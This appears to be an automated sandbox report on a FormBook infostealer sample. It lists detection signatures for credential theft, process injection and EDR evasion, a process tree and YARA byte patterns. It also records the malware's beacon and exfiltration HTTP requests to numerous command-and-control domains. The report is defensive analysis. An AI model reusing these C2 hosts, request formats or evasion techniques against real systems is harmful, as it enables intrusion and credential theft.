
Windows Analysis Report
SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
Analysis ID: 1474004
MD5: 13c0e83573fffeb4e951929815daf4e1
SHA1: 9e1302aaabccb29247948ded46c92fca6d1fa2a0
SHA256: d37fe4f855049ecab456f1badc8f52afecf4d6ee3d7d43de84b7e0940dbb7399
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shut down / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe" MD5: 13C0E83573FFFEB4E951929815DAF4E1)
    • svchost.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rULxYvbAFLatPN.exe (PID: 3300 cmdline: "C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • makecab.exe (PID: 7656 cmdline: "C:\Windows\SysWOW64\makecab.exe" MD5: 00824484BE0BCE2A430D7F43CD9BABA5)
          • rULxYvbAFLatPN.exe (PID: 1668 cmdline: "C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7772 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2e982:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x18011:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2ab70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2d2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2e0b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ParentProcessId: 7276, ParentProcessName: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ProcessId: 7292, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ParentProcessId: 7276, ParentProcessName: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe", ProcessId: 7292, ProcessName: svchost.exe
            No Snort rule has matched


            AV Detection

            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | ReversingLabs: Detection: 36%
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Virustotal: Detection: 29%
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Joe Sandbox ML: detected
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: makecab.pdbGCTL | source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: rULxYvbAFLatPN.exe, 00000005.00000000.1905502256.00000000002BE000.00000002.00000001.01000000.00000005.sdmp, rULxYvbAFLatPN.exe, 00000007.00000000.2054148696.00000000002BE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP | source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb | source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1658047056.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1656804826.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1984342146.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890105998.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1984342146.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1891740698.0000000003600000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, makecab.exe, 00000006.00000003.1986389110.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000003.1984146113.0000000004346000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.000000000483E000.00000040.00001000.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101017496.00000000046A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: makecab.pdb | source: svchost.exe, 00000001.00000003.1952888154.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1952748219.000000000322C000.00000004.00000020.00020000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000005.00000002.4100007794.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb | source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP | source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmp, makecab.exe, 00000006.00000002.4101618826.0000000004CCC000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2273797702.00000000237AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_008E4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_008EC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EC93C FindFirstFileW,FindClose | 0_2_008EC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_008EF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_008EF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_008EF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_008E3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_008E3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_008EBF27
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: 6_2_0282BEF0 FindFirstFileW,FindNextFileW,FindClose | 6_2_0282BEF0
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: 4x nop then xor eax, eax | 6_2_028196C0
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: 4x nop then pop edi | 6_2_0281E189
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_0459053F

            Networking

            Source: DNS query: www.rtpdewata4d-16.xyz
            Source: Joe Sandbox View | IP Address: 203.161.41.205
            Source: Joe Sandbox View | IP Address: 3.33.130.190
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_008F25E2
            Source: global traffic | HTTP traffic detected: GET /esfu/?UbV=gh5yKdvhconYF1IQdW8vdxSZdz4d9+SHwgQXx3mIDLUkg8HVZvA84ZxaBoLmPIr804qY2VBHslVt+Qh3tR7ZY1ctik1AAurafdW52ChWUJGqDg8qNhYLIWg=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.kundalisathi.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /7ein/?UbV=/ihImCX+1rYe7Vz3Kk/QKb9OP755DF44RGQCiMJXBGw4by48MaukmXBDJs8Bc6H1E8vVem8tLNCMtrUfB/Ur9IMKSu+lAmmznonV11JSP5QMQGeoH+bhzTc=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.quixaclienti.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.mysticriverpath.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.bearclaw.bot | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4+4eFgr/++B8wLRVxCj6ZcFesL3DTSsX/73fVlamlaT/sJduaX9mgiTgnUifyDkvpJfWGHGD/zyQ=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.focusonsocials.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /pgto/?UbV=E7gJQqjSEHiqU9c9ksgsPN71gncF+WmU2fL1k5JHUJhFxTz44zYRR/afhYUOahGq3ZObWGCJogocVOMqr7fasKcgDvUaUtJUxsyY6DreonZJ8NGE1S91eUs=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.onlandtoy.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /snq6/?UbV=NSopt7KlKYWZPRkA7oY6sPxNomLcvlV5CqP+M6qmG+AJc6mQ/tzSijSCkZiEOKdTyH8X5nOn6MDLSgA5+pRURkcx9XBmg+R/K4xPlWUgSqmVkrADB3U9/MQ=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.quiluxx.top | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /sq05/?UbV=4vYp4xDXBquPAaly5jqpyiz8vvwHg+w1s2ckl3sNoEBm9sSVWgAmrZHKJppZ7gqiYW0PudZtcTAAOkaLjZ+tbjDRBawb/1kyJrI7kWHcwz8aVyTLSwOG2zw=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.bb58cc.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.bestandpure.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.rtpdewata4d-16.xyz | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.itsjojosiwas.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.kera333.org | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.lmsforsme.com | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /fl6s/?UbV=A0xF7xRkJcHWMje5ph9HwG4I+mL/4fGguKCb0ROeX6+MB4i3E47mIUkdVM9rjjeu+d+SM2PwCOtJO5VtZmrS2xNTeXttUbHK0PGy4AIus9DMh4I9KsOxy7U=&Y4gp=mlltcrRxcL HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.3333711m14.shop | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: img.id = 'fb_' + imgId, img.src = 'https://www.facebook.com/tr/?' + params.join('&'), img.width = 1, img.height = 1, img.style = 'display:none;'; equals www.facebook.com (Facebook)
            Source: global traffic | DNS traffic detected: DNS query: www.kundalisathi.com
            Source: global traffic | DNS traffic detected: DNS query: www.quests-galxe.com
            Source: global traffic | DNS traffic detected: DNS query: www.quixaclienti.com
            Source: global traffic | DNS traffic detected: DNS query: www.mysticriverpath.com
            Source: global traffic | DNS traffic detected: DNS query: www.bearclaw.bot
            Source: global traffic | DNS traffic detected: DNS query: www.focusonsocials.com
            Source: global traffic | DNS traffic detected: DNS query: www.onlandtoy.com
            Source: global traffic | DNS traffic detected: DNS query: www.quiluxx.top
            Source: global traffic | DNS traffic detected: DNS query: www.bb58cc.com
            Source: global traffic | DNS traffic detected: DNS query: www.bestandpure.com
            Source: global traffic | DNS traffic detected: DNS query: www.rtpdewata4d-16.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.itsjojosiwas.com
            Source: global traffic | DNS traffic detected: DNS query: www.kera333.org
            Source: global traffic | DNS traffic detected: DNS query: www.lmsforsme.com
            Source: global traffic | DNS traffic detected: DNS query: www.3333711m14.shop
            Source: global traffic | DNS traffic detected: DNS query: www.iitaccounting.com
            Source: unknown | HTTP traffic detected: POST /7ein/ HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 200 | Cache-Control: max-age=0 | Host: www.quixaclienti.com | Origin: http://www.quixaclienti.com | Referer: http://www.quixaclienti.com/7ein/ | User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 | Data Raw: 55 62 56 3d 79 67 4a 6f 6c 33 43 63 36 37 59 61 7a 57 50 48 4b 48 47 73 48 62 74 58 45 66 46 76 4f 55 49 72 66 68 30 66 6f 4f 45 45 45 32 46 62 64 43 6b 56 56 4a 4b 5a 31 41 74 34 4d 49 38 70 49 4b 4c 71 49 66 58 43 65 44 46 72 44 59 76 62 68 4c 6c 71 4d 74 45 33 31 61 68 39 63 4d 75 70 4c 54 75 64 38 49 76 43 31 6d 70 66 4f 61 46 49 61 46 4b 2f 44 4f 6a 31 79 78 4e 6f 33 69 6e 6a 6f 51 55 63 62 2b 6e 68 34 37 4f 76 30 44 43 4e 38 4f 45 72 78 63 6a 44 78 32 63 33 63 72 49 4b 79 6e 58 48 41 67 37 69 42 65 55 45 6a 30 48 42 65 67 4b 38 53 68 68 2b 53 4b 64 42 37 59 4a 68 31 39 36 42 43 41 3d 3d | Data Ascii: UbV=ygJol3Cc67YazWPHKHGsHbtXEfFvOUIrfh0foOEEE2FbdCkVVJKZ1At4MI8pIKLqIfXCeDFrDYvbhLlqMtE31ah9cMupLTud8IvC1mpfOaFIaFK/DOj1yxNo3injoQUcb+nh47Ov0DCN8OErxcjDx2c3crIKynXHAg7iBeUEj0HBegK8Shh+SKdB7YJh196BCA==
